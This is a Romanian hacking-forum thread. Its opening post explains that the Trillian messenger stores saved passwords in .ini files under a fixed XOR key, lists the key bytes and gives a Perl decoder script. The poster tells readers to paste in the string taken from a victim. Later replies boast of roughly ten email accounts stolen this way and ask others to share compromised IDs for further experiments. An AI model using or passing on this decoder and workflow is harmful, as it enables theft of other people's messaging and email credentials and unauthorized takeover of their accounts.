Decriptarea parolelor din programul Trilian

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
Tanya321

Femeie
24 ani
Giurgiu
cauta Barbat
24 - 63 ani

Hacking and more... / n00bs / Decriptarea parolelor din programul Trilian

Moderat de Shocker

Autor

Mesaj

Pagini: 1

TE4L
Super Buruian

Inregistrat: acum 17 ani
Postari: 356

Am gasit o chestie care sper sa va foloseasca. Dupa cum spune si titlul este metoda de a decripta o parola de yahoo,msn,aol,icq,mirc etc stocata in programul trilian. Pt inceput trebuie sa stiti ca parola se afla in folderul de instalare trilian (default c:program filestrilianusersdefault) in fisierul pe care il doriti adica - aim.ini,msn.ini,yahoo.ini etc.
Cand deschideti aceste fisiere veti vedea ceva de genul
[msn]
auto reconnect=1
save passwords=1
idle time=15
show buddy status=1
port=1863
server=messenger.hotmail.com
last msn=
connect num=10
connect sec=60
save status=1
ft port=6891
[profile 0]
name=
password=A347F2B74EE9A9F6.

Linia "password=blablabla" e cea care va intereseaza. In ciuda faptului ca trilian este un program foarte bun,parolele sunt criptate ptin banala metoda xor. Sirul de caractere pe care l-ati vazut reprezinta criptarea xor a parolei originale sub forma hexazecimala. Daca descompuneti sirul in grupuri de cate 2 veti vedea ce vreau sa spun -> A3 47 F2 B7 4E E9 A9 F6.

Cei care cunosc sistemul de numeratie hex si-au dat deja seama ca a3 estede fapt 163.Fara sa o mai lungesc mult trebuie sa va spun ca fiecare litera a parolei este criptata cu o valoare defalut,care nu poate fi schimbata. Prima litera a parolei este combinata cu 243,a 2-a cu 038 etc. Deci ca sa spargem parola trebuie doar sa facem operatiile in ordine inversa. Adica X(prima litera a parolei) xor 243 = 163.

Cred ca va dati deja seama cat de usor a devenit de spart aceasta parola.
Hex key-urile pt fiecare litera a parolei sunt "243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185,
230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000".

Cum de obicei o parola nu depaseste 5-10 caractere nu veti avea niciodata nevoie de toate.
Ca sa va fie mai usor aveti aici si un script in perl,trebuie doar compilat,si va decripteaza parola. A,inlocuiti PAROLA cu sirul de caractere pe care l-ati furat de la victima

Code:

#!/usr/bin/perl

#################
# Trillian Password Decoder
#################


$encrypted = "PAROLA";  # aici puneti parola voastra
$xorkeys = "243, 038, 129, 196, 057, 134, 219, 
146, 113, 163, 185, 230, 083, 122, 149, 124, 
000, 000, 000, 000, 000, 000, 255, 000, 000, 
128, 000, 000, 000, 128, 128, 000, 255, 000, 
000, 000, 128, 000, 128, 000, 128, 128, 000, 
000, 000, 128, 255, 000, 128, 000, 255, 000, 
128, 128, 128, 000, 085, 110, 097, 098, 108, 
101, 032, 116, 111, 032, 114, 101, 115, 111, 
108, 118, 101, 032, 072, 084, 084, 080, 032, 
112, 114, 111, 120, 000";
$pointer = 0;

@keys = split(/, /, $xorkeys);

print "Parola decriptata ";

foreach $key (@keys)
{
        $passchar = chr(hex(substr($encrypted, $pointer, 2)) ^ $key);
        print "$passchar";
        last if ($pointer == length($encrypted) - 2);
        $pointer += 2;
}

exit;

Modificat de DarthSion (acum 17 ani)

_______________________________________

Beware of the buruian( he is ... super )

pus acum 17 ani

big chuck
A firewall

Din: Inside the band
Inregistrat: acum 17 ani
Postari: 589

Bleah I understand like 20% of what ya posted

so does it work?

_______________________________________
The answer is not in the box,the answer is in the band

pus acum 17 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602

thx DarthSion frumos tutorial

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani

TE4L
Super Buruian

Inregistrat: acum 17 ani
Postari: 356

Glad you like it Dreamer

. Big CHuck,the script above is used to decrypt trillian passwords. By taking the password extracted from the trilian folder and putting it in the perl script it will be revealed

. I tried this on me a few hours ago. It works perfectly.

_______________________________________

Beware of the buruian( he is ... super )

pus acum 17 ani

big chuck
A firewall

Din: Inside the band
Inregistrat: acum 17 ani
Postari: 589

So if the victim uses YM ? or not trillian..

_______________________________________
The answer is not in the box,the answer is in the band

pus acum 17 ani

TE4L
Super Buruian

Inregistrat: acum 17 ani
Postari: 356

Well,if they use anything but trillian we will use other methods to find out the passwords. I am sure that the yahoo messenger password is stored in the profiles directory but i don't know how to decrypt it. If anyone find out,please post it

_______________________________________

Beware of the buruian( he is ... super )

pus acum 17 ani

big chuck
A firewall

Din: Inside the band
Inregistrat: acum 17 ani
Postari: 589

Yahoo is very secure

_______________________________________
The answer is not in the box,the answer is in the band

pus acum 17 ani

epic
User

Inregistrat: acum 17 ani
Postari: 1896

darthsion, tutorialul este superb. o sa-l incerc pe trillian-ul meu chiar acum.

_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 17 ani

dasda
-

Inregistrat: acum 17 ani
Postari: 265

da daca yahoo e securizat eu imi tai pu*a

_______________________________________
Imperfect ? Where ? ...

pus acum 17 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602

darthsion tutorialul este facut de tine?

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani

TE4L
Super Buruian

Inregistrat: acum 17 ani
Postari: 356

In forma actuala tutorialul este exclusiv al meu. Scriptul insa apartine unui asa zis wang. Cat timp va foloseste,totul e ok.

_______________________________________

Beware of the buruian( he is ... super )

pus acum 17 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602

e super mersi inca odata !

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani

epic
User

Inregistrat: acum 17 ani
Postari: 1896

merge bine, pana acum cred ca am luat vreo 10 conturi de mail de pe dc++

_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 17 ani

TE4L
Super Buruian

Inregistrat: acum 17 ani
Postari: 356

HAHAHAHAH epic... HAHAHAHAH.... Esti tare

. Daca gasesti vreun id cu mai multe contacte in lista,posteaza-l si tu te rog,ca vreau sa incerc niste chestii si nu am nici un id de test

. Oricum,imi pare bine ca va foloseste.

_______________________________________

Beware of the buruian( he is ... super )

pus acum 17 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602

m-as putea eu loga pe YM si MSN din trilian ...sa incerci ce vrei...te ajut eu...sa imi zici cand.si ce sa fac

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani

Pagini: 1

Mergi la